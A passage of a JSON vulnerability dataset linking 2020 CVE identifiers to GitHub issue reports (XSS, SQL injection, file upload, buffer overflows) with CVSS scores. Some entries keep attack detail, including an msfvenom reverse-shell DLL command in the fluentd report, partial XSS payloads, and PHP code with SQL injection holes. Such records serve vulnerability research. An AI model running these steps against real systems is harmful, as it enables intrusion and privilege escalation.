        "description": "Improve Workiing Directory creation. Jetty version NUMBERTAG Java version All OS type/version All Description When the APITAG deploys an application, the temp directory creation is using an old Java Classlib API for creating unique directories. Lets modernize this, as newer Java Classlib APIs exist to make this a single step.",
        "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.0,
        "impactScore": 5.9,
        "exploitabilityScore": 1.0
    },
    {
        "CVE_ID": "CVE-2020-27219",
        "Issue_Url_old": "https://github.com/eclipse/hawkbit/issues/1067",
        "Issue_Url_new": "https://github.com/eclipse/hawkbit/issues/1067",
        "Repo_new": "eclipse/hawkbit",
        "Issue_Created_At": "2021-01-11T07:26:25Z",
        "description": "Cross site scripting vulnurability. Hi, our security team reported an issue with our Hawkbit instance: Request: POST to /cgi bin/ APITAG xss test APITAG .asp Response: {\"timestamp NUMBERTAG APITAG ERRORTAG APITAG APITAG PATHTAG APITAG .asp\"} I was able to reproduce this behavior on your sandbox instance. Btw. for GET requests the path is not returned. Could you please provide a fix or a workaround for that behavior? Kind regards, Holger",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-27224",
        "Issue_Url_old": "https://github.com/eclipse-theia/theia/issues/7954",
        "Issue_Url_new": "https://github.com/eclipse-theia/theia/issues/7954",
        "Repo_new": "eclipse-theia/theia",
        "Issue_Created_At": "2020-06-03T20:15:17Z",
        "description": "security] XSS vulnerability in markdown preview. Bug Description: XSS vulnerability in markdown preview The Markdown Preview can exploited to execute arbitrary code. Steps to Reproduce NUMBERTAG Create markdown file and append the following text: APITAG NUMBERTAG Save and close the file NUMBERTAG Right click the file and select Open With > Preview NUMBERTAG Observe the alert has fired. The root cause of the vulnerability is the current usage of [markdown it URLTAG to render html URLTAG then subsequently adding the output to the DOM via APITAG URLTAG without sanitizing. Moreover, there are several potential xss sinks within the Theia code base that could potentially be exploited in a similar fashion (e.g. APITAG URLTAG , APITAG URLTAG would the community be open to accepting contributions to mitigate these vulnerabilities, and accompanying lint rules that would bar future usages of xss sinks? Additional Information Operating System: Linux Theia Version NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.6,
        "impactScore": 6.0,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-27403",
        "Issue_Url_old": "https://github.com/sickcodes/security/issues/1",
        "Issue_Url_new": "https://github.com/sickcodes/security/issues/1",
        "Repo_new": "sickcodes/security",
        "Issue_Created_At": "2020-11-28T23:06:34Z",
        "description": "Some models have different open port for webserver with root fs NUMBERTAG Tested on U NUMBERTAG P NUMBERTAG with Android8. Installed f droid.on the TV and APITAG (nmap) and scanned all ports on localhost APITAG Serveral open ports and port NUMBERTAG contained the save http server with the entire fs available for free. Any app could this way access anything,bypassing all security. Not binded to wifi ip address,however,perhaps already fixed remotely by TCL. Localhost binding still present and several other services available via localhost as well.",
        "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-27533",
        "Issue_Url_old": "https://github.com/dedetech/issues/issues/16",
        "Issue_Url_new": "https://github.com/dedetech/issues/issues/16",
        "Repo_new": "dedetech/issues",
        "Issue_Created_At": "2020-07-26T20:14:58Z",
        "description": "Cross Site Scripting APITAG Affected software : APITAG Version NUMBERTAG Type of vulnerability : XSS APITAG Site Scripting) Author : Noth Description: APITAG CMS is susceptible to cross site scripting attacks, allowing malicious users to inject code into web pages, and other users will be affected when viewing web pages APITAG NUMBERTAG login admin page URLTAG FILETAG NUMBERTAG Type XSS Payload in the search ==> \"> APITAG alert NUMBERTAG APITAG FILETAG Test Video : URLTAG Reason: Failure to filter or escape special characters leads to vulnerabilities How to fix : escape special characters or filter it .",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-27814",
        "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/1283",
        "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/1283",
        "Repo_new": "uclouvain/openjpeg",
        "Issue_Created_At": "2020-11-23T10:08:15Z",
        "description": "Heap buffer overflow in PATHTAG I found a heap buffer overflow in the current master NUMBERTAG e URLTAG . I build openjpeg with ASAN, this is ASAN report. POC picture : FILETAG ERRORTAG I also try to prove it without ASAN. ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-27828",
        "Issue_Url_old": "https://github.com/jasper-software/jasper/issues/252",
        "Issue_Url_new": "https://github.com/jasper-software/jasper/issues/252",
        "Repo_new": "jasper-software/jasper",
        "Issue_Created_At": "2020-11-30T09:22:12Z",
        "description": "Heap buffer overflow in PATHTAG I found a heap buffer overflow in the current master NUMBERTAG URLTAG . I build jasper with ASAN, this is an ASAN report. POC picture : FILETAG ERRORTAG I also try to prove it without ASAN. It malloc NUMBERTAG bytes in APITAG When APITAG It tries to write APITAG and causes heap buffer overflow write.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-27848",
        "Issue_Url_old": "https://github.com/dotCMS/core/issues/19500",
        "Issue_Url_new": "https://github.com/dotcms/core/issues/19500",
        "Repo_new": "dotcms/core",
        "Issue_Created_At": "2020-10-27T01:40:55Z",
        "description": "SQL Injection Vulnerability in api PATHTAG api : PATHTAG Is vulnerable to SQL injection, by the parameter \u2018orderby\u2019 in url. APITAG APITAG As the pictures above shows, APITAG , it took NUMBERTAG seconds to receive the response from server APITAG , it took NUMBERTAG seconds to receive the response from server Then I read through the code that I download from github(version NUMBERTAG I found that the parameter will form SQL without sterilization (yeah, you have designed APITAG to prevent SQL injection, but in this case, the vulnerable API didn't call APITAG I tried to attack the project by sqlmap(a tool to detect and exploit SQL injection), and here is the result that sqlmap gave me: tables that the project contains: APITAG columns that the table called \u2018adminconfig\u2019 contains: APITAG It\u2019s obviously that there is SQL injection in your program.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-27853",
        "Issue_Url_old": "https://github.com/wireapp/wire-audio-video-signaling/issues/23",
        "Issue_Url_new": "https://github.com/wireapp/wire-avs/issues/23",
        "Repo_new": "wireapp/wire-avs",
        "Issue_Created_At": "2020-09-02T13:34:30Z",
        "description": "Format String Vulnerability. Format String Vulnerability There is a Format String vulnerability in sdp.cpp line NUMBERTAG URLTAG The function parameter value of function APITAG is controllable by an attacker and can lead to a format string attack. The function APITAG is implemented in media.c of the library re. The vulnerability is fixed in current Android and iOS Wire Applications. The vulnerability was exploitable in the Android and iOS Wire Apps at least until Wire Android Version NUMBERTAG and iOS Version NUMBERTAG An attacker could crash remote Wire Applications by a call with malformed sdp data, if the remote particpant accepts the call. The vulnerability could potentially lead to remote code execution.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-27886",
        "Issue_Url_old": "https://github.com/EyesOfNetworkCommunity/eonweb/issues/76",
        "Issue_Url_new": "https://github.com/eyesofnetworkcommunity/eonweb/issues/76",
        "Repo_new": "eyesofnetworkcommunity/eonweb",
        "Issue_Created_At": "2020-10-23T07:52:25Z",
        "description": "Multiples vuln\u00e9rabilit\u00e9s critiques. Bonjour, J'ai identifi\u00e9 de nouvelles vuln\u00e9rabilit\u00e9s qui, combin\u00e9es ensemble permettent de prendre le contr\u00f4le complet d'un serveur EON \u00e0 distance mis \u00e0 jour depuis les versions r7 et r8 de eonweb actuellement publi\u00e9es dans les paquets officiels. L'impact est similaire aux codes d'exploitation publi\u00e9s ici : URLTAG J'ai pu valider la pr\u00e9sence des vuln\u00e9rabilit\u00e9s ainsi que l'exploitation de celles ci pouvant amener \u00e0 l'ex\u00e9cution de commandes en tant que root sans authentification pr\u00e9alable. Je peux communiquer les d\u00e9tails des vuln\u00e9rabilit\u00e9s identifi\u00e9es ici si vous le souhaitez.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-28062",
        "Issue_Url_old": "https://github.com/hisiphp/hisiphp/issues/10",
        "Issue_Url_new": "https://github.com/hisiphp/hisiphp/issues/10",
        "Repo_new": "hisiphp/hisiphp",
        "Issue_Created_At": "2020-10-21T10:44:22Z",
        "description": "There is a file upload vulnerability that can execute arbitrary code. In APITAG after the administrator logs in, the installation package FILETAG file) can be uploaded at the system > local plug in > import plug in FILETAG The code for uploading the logic is located in the APITAG function of the PATHTAG class, where the zip file is extracted before being safely processed. Special packets can be constructed in APITAG Throws an exception to bypass the security check Package FILETAG as a zip file (make sure there are APITAG /plugins/ under the path) Poc as follows FILETAG The response contains the path FILETAG You can see that FILETAG is uploaded FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2020-28087",
        "Issue_Url_old": "https://github.com/zhangdaiscott/jeecg-boot/issues/1887",
        "Issue_Url_new": "https://github.com/jeecgboot/jeecg-boot/issues/1887",
        "Repo_new": "jeecgboot/jeecg-boot",
        "Issue_Created_At": "2020-10-24T09:33:04Z",
        "description": "sql NUMBERTAG After testing, it is found that the code parameter of /jeecg PATHTAG interface of jeecg boot has SQL injection \u622a\u56fe&\u4ee3\u7801\uff1a Reuse URLTAG After the source code of the project starts the project, click \"custom component\" and grab the package to get the interface with SQL injection, and use sqlmap to prove the existence of SQL injection FILETAG FILETAG FILETAG The vulnerability code exists in the following PATHTAG At line NUMBERTAG of FILETAG \u53cb\u60c5\u63d0\u793a\uff1a \u672a\u6309\u683c\u5f0f\u8981\u6c42\u53d1\u5e16\uff0c\u4f1a\u76f4\u63a5\u5220\u6389\u3002",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-28088",
        "Issue_Url_old": "https://github.com/zhangdaiscott/jeecg-boot/issues/1888",
        "Issue_Url_new": "https://github.com/jeecgboot/jeecg-boot/issues/1888",
        "Repo_new": "jeecgboot/jeecg-boot",
        "Issue_Created_At": "2020-10-24T10:12:13Z",
        "description": "There is an arbitrary file upload vulnerability NUMBERTAG After testing, it is found that there is an arbitrary file upload vulnerability in the image upload function of \"custom component\" of jeecg boot, and the interface is PATHTAG \u622a\u56fe&\u4ee3\u7801\uff1a Reuse URLTAG After the source code of the project is started, click \"custom component\" and grab the package to get the interface with arbitrary file upload vulnerability FILETAG Modify the upload suffix name and upload content through packet capture FILETAG The vulnerability code exists in the following PATHTAG At line NUMBERTAG of FILETAG \u53cb\u60c5\u63d0\u793a\uff1a \u672a\u6309\u683c\u5f0f\u8981\u6c42\u53d1\u5e16\uff0c\u4f1a\u76f4\u63a5\u5220\u6389\u3002",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-28091",
        "Issue_Url_old": "https://github.com/cbkhwx/cxuucmsv3/issues/1",
        "Issue_Url_new": "https://github.com/cbkhwx/cxuucmsv3/issues/1",
        "Repo_new": "cbkhwx/cxuucmsv3",
        "Issue_Created_At": "2020-10-24T16:32:51Z",
        "description": "SQL injection vulnerability exists in FILETAG url. An SQL injection vulnerability exists in the front end FILETAG page Use sqlmap to inject the demo website\uff1a exp : CODETAG Verify screenshot\uff1a FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-28092",
        "Issue_Url_old": "https://github.com/lazyphp/PESCMS-TEAM/issues/6",
        "Issue_Url_new": "https://github.com/lazyphp/pescms-team/issues/6",
        "Repo_new": "lazyphp/PESCMS-TEAM",
        "Issue_Created_At": "2020-11-02T13:50:09Z",
        "description": "PECSM TEAM NUMBERTAG has multiple reflected Cross Site Scripting Vulnerability. I found a reflective XSS vulnerability at: URLTAG APITAG now I input payload APITAG APITAG the full url is : URLTAG And many pages use id parameters, and they all reflect cross site scripting vulnerabilities\uff1a URLTAG URLTAG URLTAG URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-28102",
        "Issue_Url_old": "https://github.com/chshcms/cscms/issues/9",
        "Issue_Url_new": "https://github.com/chshcms/cscms/issues/9",
        "Repo_new": "chshcms/cscms",
        "Issue_Created_At": "2020-10-26T07:13:46Z",
        "description": "Cscms NUMBERTAG has sqlinjection vulnerability NUMBERTAG APITAG summary Vulnerability APITAG NUMBERTAG has sqlinjection vulnerabilities Report date NUMBERTAG Product Home: FILETAG Software link: FILETAG Version NUMBERTAG APITAG overview Vulnerability PATHTAG NUMBERTAG lines NUMBERTAG lines Vulnerability function\uff1ajs_del Vulnerability param:id public function APITAG $id = $this >input >get_post('id'); if(empty($id)) getjson(L('plub NUMBERTAG if(is_array($id)){ foreach ($id as $ids) { $row=$this >db >query(\"SELECT js FROM APITAG where APITAG APITAG if($row){ PATHTAG APITAG } } }else{ $row=$this >db >query(\"SELECT js FROM APITAG where APITAG APITAG if($row){ PATHTAG APITAG } } $this APITAG >get_del('ads',$id); $info FILETAG right answer: FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-28103",
        "Issue_Url_old": "https://github.com/chshcms/cscms/issues/8",
        "Issue_Url_new": "https://github.com/chshcms/cscms/issues/8",
        "Repo_new": "chshcms/cscms",
        "Issue_Created_At": "2020-10-26T07:07:29Z",
        "description": "Cscms NUMBERTAG has sqlinjection vulnerability NUMBERTAG APITAG summary Vulnerability APITAG NUMBERTAG has sqlinjection vulnerabilities Report date NUMBERTAG Product Home: FILETAG Software link: FILETAG Version NUMBERTAG APITAG overview Vulnerability PATHTAG NUMBERTAG lines NUMBERTAG lines Vulnerability function\uff1apage_del Vulnerability param:id public function APITAG $id = $this >input >get_post('id'); if(empty($id)) getjson(L('plub NUMBERTAG if(is_array($id)){ foreach ($id as $ids) { $row=$this >db >query(\"SELECT sid,url FROM APITAG where APITAG APITAG if($row && $row >sid NUMBERTAG APITAG >url; APITAG } } }else{ $row=$this >db >query(\"SELECT sid,url FROM APITAG where APITAG APITAG if($row && $row >sid NUMBERTAG APITAG >url; APITAG } } $this APITAG >get_del('page',$id); $info FILETAG right answer: FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-28146",
        "Issue_Url_old": "https://github.com/eyoucms/eyoucms/issues/12",
        "Issue_Url_new": "https://github.com/weng-xianhu/eyoucms/issues/12",
        "Repo_new": "weng-xianhu/eyoucms",
        "Issue_Created_At": "2020-05-29T02:15:56Z",
        "description": "There is a Persistent Cross Site Scripting in the member contributions.. In the member center member contribution office, after editing the contribution content through the editor, intercept the data package, modify the parameter addonfieldext FILETAG FILETAG After the administrator logs in the background, when viewing the content submitted by the user, it triggers the payload to obtain the cookie information. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-28168",
        "Issue_Url_old": "https://github.com/axios/axios/issues/3369",
        "Issue_Url_new": "https://github.com/axios/axios/issues/3369",
        "Repo_new": "axios/axios",
        "Issue_Created_At": "2020-10-29T14:37:32Z",
        "description": "Requests that follow a redirect are not passing via the proxy. APITAG Describe the bug In cases where axios is used by servers to perform http requests to user supplied urls, a proxy is commonly used to protect internal networks from unauthorized access and SSRF URLTAG . This bug enables an attacker to bypass the proxy by providing a url that responds with a redirect to a restricted host/ip. To Reproduce The following code spawns a proxy server that always responds with a NUMBERTAG redirect, so requests should never reach the target url, however, axios is only reaching the proxy once, and bypassing the proxy after the redirect response. URLTAG ERRORTAG The response is the rendered html at of _ FILETAG Expected behavior All the requests should pass via the proxy. In the provided scenario, there should be a redirect loop. Environment Axios Version NUMBERTAG FILETAG Version APITAG Additional APITAG Add any other context about the problem here. If applicable, add screenshots to help explain.",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.9,
        "impactScore": 3.6,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2020-28169",
        "Issue_Url_old": "https://github.com/fluent/fluentd/issues/3201",
        "Issue_Url_new": "https://github.com/fluent/fluentd/issues/3201",
        "Repo_new": "fluent/fluentd",
        "Issue_Created_At": "2020-12-11T16:55:44Z",
        "description": "Possible Vulnerability. FILETAG Describe the bug Inappropriate folder permissions, possible escalation of privileges' on Windows To Reproduce Download URL: FILETAG Vulnerable Path: PATHTAG Steps in reproducing the exploit: Creating a DLL containing a reverse shell with the specific name that FILETAG will search: msfvenom p PATHTAG a NUMBERTAG f dll LHOST= IPADRRESS LPORT= PORT > CRYPTBASE.dll Setting up MSF console to listen for connection. Copying the DLL file that we created to PATHTAG using a limited account: Normally, a limited user might not have the possibility of restarting the service. A potential attacker can wait for the service to be restarted or he can restart the machine from command line; when the service restarts, it will trigger the DLL and get NT Authority. Expected behavior N/A Your Environment Windows NUMBERTAG If you hit the problem with older fluentd version, try latest version first. Your Configuration Default Your Error Log No errors. Additional context Please add an appropriate contact method to submit possible vulnerabilities and POC's.",
        "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.0,
        "impactScore": 5.9,
        "exploitabilityScore": 1.0
    },
    {
        "CVE_ID": "CVE-2020-28241",
        "Issue_Url_old": "https://github.com/maxmind/libmaxminddb/issues/236",
        "Issue_Url_new": "https://github.com/maxmind/libmaxminddb/issues/236",
        "Repo_new": "maxmind/libmaxminddb",
        "Issue_Created_At": "2020-08-04T13:43:37Z",
        "description": "A heap buffer overflow in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), mmdblookup (latest master e6e NUMBERTAG a URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure enable static Command line PATHTAG ip APITAG file APITAG APITAG output ERRORTAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-28348",
        "Issue_Url_old": "https://github.com/hashicorp/nomad/issues/9303",
        "Issue_Url_new": "https://github.com/hashicorp/nomad/issues/9303",
        "Repo_new": "hashicorp/nomad",
        "Issue_Created_At": "2020-11-10T13:30:44Z",
        "description": "placeholder.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-28452",
        "Issue_Url_old": "https://github.com/softwaremill/akka-http-session/issues/77",
        "Issue_Url_new": "https://github.com/softwaremill/akka-http-session/issues/77",
        "Repo_new": "softwaremill/akka-http-session",
        "Issue_Created_At": "2020-11-24T16:51:40Z",
        "description": "CSRF protection can be bypassed . Hi again, Another question about the CSRF protection. It can be bypassed by forging a request that contains the same value for both the X XSRF TOKEN header and the XSRF TOKEN cookie value. Any value will do since the only check that is now performed in APITAG is for those two values to be equal and non empty. Would it be somehow possible to conform to the OWASP recommendations described FILETAG what do you think would be the best approach? Thanks, Willem",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-28456",
        "Issue_Url_old": "https://github.com/s-cart/s-cart/issues/52",
        "Issue_Url_new": "https://github.com/s-cart/s-cart/issues/52",
        "Repo_new": "s-cart/s-cart",
        "Issue_Created_At": "2020-12-01T05:03:16Z",
        "description": "stored XSS . Stored XSS there is a stored XSS , which is critical because an unauth user can send js code to admin panel , which cloud lead admin Account tack over. To Reproduce Steps to reproduce the behavior NUMBERTAG got to s cart store while adding product to the cart , intercept it and usei the payload in APITAG parm FILETAG NUMBERTAG after proceeding the purchase , the code will execute while trying to edit it in the amdin panel here is the POC video : URLTAG payload used = \"> APITAG alert(\"test\") APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-28457",
        "Issue_Url_old": "https://github.com/s-cart/s-cart/issues/51",
        "Issue_Url_new": "https://github.com/s-cart/s-cart/issues/51",
        "Repo_new": "s-cart/s-cart",
        "Issue_Created_At": "2020-11-29T12:19:10Z",
        "description": "XSS in admin dashboard. Reflected xss in admin panel There is a cross site scripting or XSS is admin Dashboard To Reproduce NUMBERTAG the search function in admin dashboard is vulnerable for XSS URLTAG Screenshots FILETAG Fix for it :) Useing APITAG in s cart/core URLTAG will fix this issue FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2020-28468",
        "Issue_Url_old": "https://github.com/Gallopsled/pwntools/issues/1427",
        "Issue_Url_new": "https://github.com/gallopsled/pwntools/issues/1427",
        "Repo_new": "gallopsled/pwntools",
        "Issue_Created_At": "2020-02-08T23:06:53Z",
        "description": "Shellcraft generation fails with strings that contains end of multiline comment. APITAG ERRORTAG Bug is in APITAG , the input string ends the multi line comment so cpp fails to compile our assembly. This happens for me on APITAG : APITAG But was also reproduced on APITAG (commit id: APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-28477",
        "Issue_Url_old": "https://github.com/immerjs/immer/issues/738",
        "Issue_Url_new": "https://github.com/immerjs/immer/issues/738",
        "Repo_new": "immerjs/immer",
        "Issue_Created_At": "2021-01-19T17:50:14Z",
        "description": "Prototype Pollution vulnerability . \ud83d\udc1b Bug Report A Prototype Pollution vulnerability has been raised by Snyk and it is affecting all versions of immer. Find more details here URLTAG It is currently blocking me for adding immer as a dependency to my projects. Cheers",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-28481",
        "Issue_Url_old": "https://github.com/socketio/socket.io/issues/3671",
        "Issue_Url_new": "https://github.com/socketio/socket.io/issues/3671",
        "Repo_new": "socketio/socket.io",
        "Issue_Created_At": "2020-10-29T20:20:39Z",
        "description": "CORS Misconfiguration in socket.io. Note: This issue was originally reported to FILETAG but as per them this issue has to be fixed by you guys, thus raising it here. The details which was shared with them is given below: While testing FILETAG I found a security issue at socket.io endpoint, description for the same is given below: Vulnerability Name: Misconfigured CORS Implementation: Arbitrary & Unencrypted Origin Trusted In APITAG at socket.io endpoint Description: Cross Origin Resource Sharing (CORS) is a mechanism for relaxing the Same Origin Policy to enable communication between websites via browsers. If misconfigured, it can lead to dangerous results. An HTML5 cross origin resource sharing (CORS) policy controls whether and how content running on other domains can perform two way interaction with the domain that publishes the policy. The policy is fine grained and can apply access controls per request based on the URL and other features of the request. Analysis: During the analysis, it was observed that the application was accepting arbitrary unencrypted domains in APITAG Control Allow Origin\u201d header thus allowing domain controlled by a malicious party to send requests to the APITAG domain which can lead to API key stealing, Cross Site Scripting, Sensitive Information Disclosure, etc. Proof of Concept: FILETAG Step NUMBERTAG Login into the application and intercept the following API call URLTAG by looking at the headers it can be seen that application has implemented CORS and is allowing cross domain communication. Please note that traditional CORS exploitation won't be working here as application is properly validating the value of Origin header which is coming in request. Now, send following domain in the Origin header FILETAG CODETAG . APITAG poc in Safari Browser, it can be seen that malicious domain is able to send authenticated requests to the APITAG domain which can lead to Sensitive Information Disclosure(here in our case sid and other details are being leaked). Note: All endpoints where application is taking values from Origin and directly appending it in Access Control Allow Origin header in response, this vulnerability can be exploited. Impact NUMBERTAG Impact of Trusting Arbitrary Origin: Trusting arbitrary origins effectively disables the same origin policy, allowing two way interaction by third party web sites. Unless the response consists only of unprotected public content, this policy is likely to present a security risk. If the site specifies the header Access Control Allow Credentials: true, third party sites may be able to carry out privileged actions and retrieve sensitive information. Even if it does not, attackers may be able to bypass any IP based access controls by proxying through users' browsers NUMBERTAG Impact of trusting Unencrypted Origin If a site allows interaction from an origin that uses unencrypted HTTP communications, then it is vulnerable to an attacker who is in a position to view and modify a user's unencrypted network traffic. The attacker can control the responses from unencrypted origins, thereby injecting content that is able to interact with the application that publishes the policy. This means that the application is effectively extending trust to all such attackers, thereby undoing much of the benefit of using HTTPS communications. Recommendation: Following are the recommendations: Ensure that URLs responding with Access Control Allow Origin: do not include any sensitive content or information that might aid attacker in further attacks. Use the Access Control Allow Origin header only on chosen URLs that need to be accessed cross domain. Don't use the header for the whole domain. Allow only selected, trusted domains in the Access Control Allow Origin header. Prefer whitelisting domains over blacklisting or allowing any domain (do not use wildcard nor blindly return the Origin header content without any checks). Application shall not dynamically generate APITAG Control Allow Origin\u201d header and proper whitelisting should be done of the domains which application wants to trust. It is recommended that application shall not dynamically generate APITAG Control Allow Origin\u201d header and proper whitelisting should be done of the domains which application wants to trust. Please make sure that you only trust origins that use encrypted HTTPS communications.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.3,
        "impactScore": 1.4,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-28483",
        "Issue_Url_old": "https://github.com/gin-gonic/gin/issues/2862",
        "Issue_Url_new": "https://github.com/gin-gonic/gin/issues/2862",
        "Repo_new": "gin-gonic/gin",
        "Issue_Created_At": "2021-09-07T19:52:25Z",
        "description": "X Forwarded For handling is still unsafe, CVETAG is NOT fixed. Description APITAG / trusted proxy handling is incorrect, which makes it possible for anyone to force the value of APITAG , if: the app has trusted proxies defined and the trusted proxy handles APITAG in the usual way, by appending its own IP address at the end (the default configuration trusts every proxy and is of course also vulnerable, in a very trivial way). This was reported in URLTAG with a fix at URLTAG That PR did not get merged, and the one that did ( URLTAG does not fix the issue. There is a fix for this already at URLTAG APITAG How to reproduce You actually have that in your tests already, see URLTAG But here's a standalone version APITAG ERRORTAG Expectations APITAG Actual result APITAG APITAG Environment go version NUMBERTAG gin version (or commit ref NUMBERTAG operating system: APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N",
        "severity": "HIGH",
        "baseScore": 7.1,
        "impactScore": 4.2,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-28483",
        "Issue_Url_old": "https://github.com/gin-gonic/gin/issues/2473",
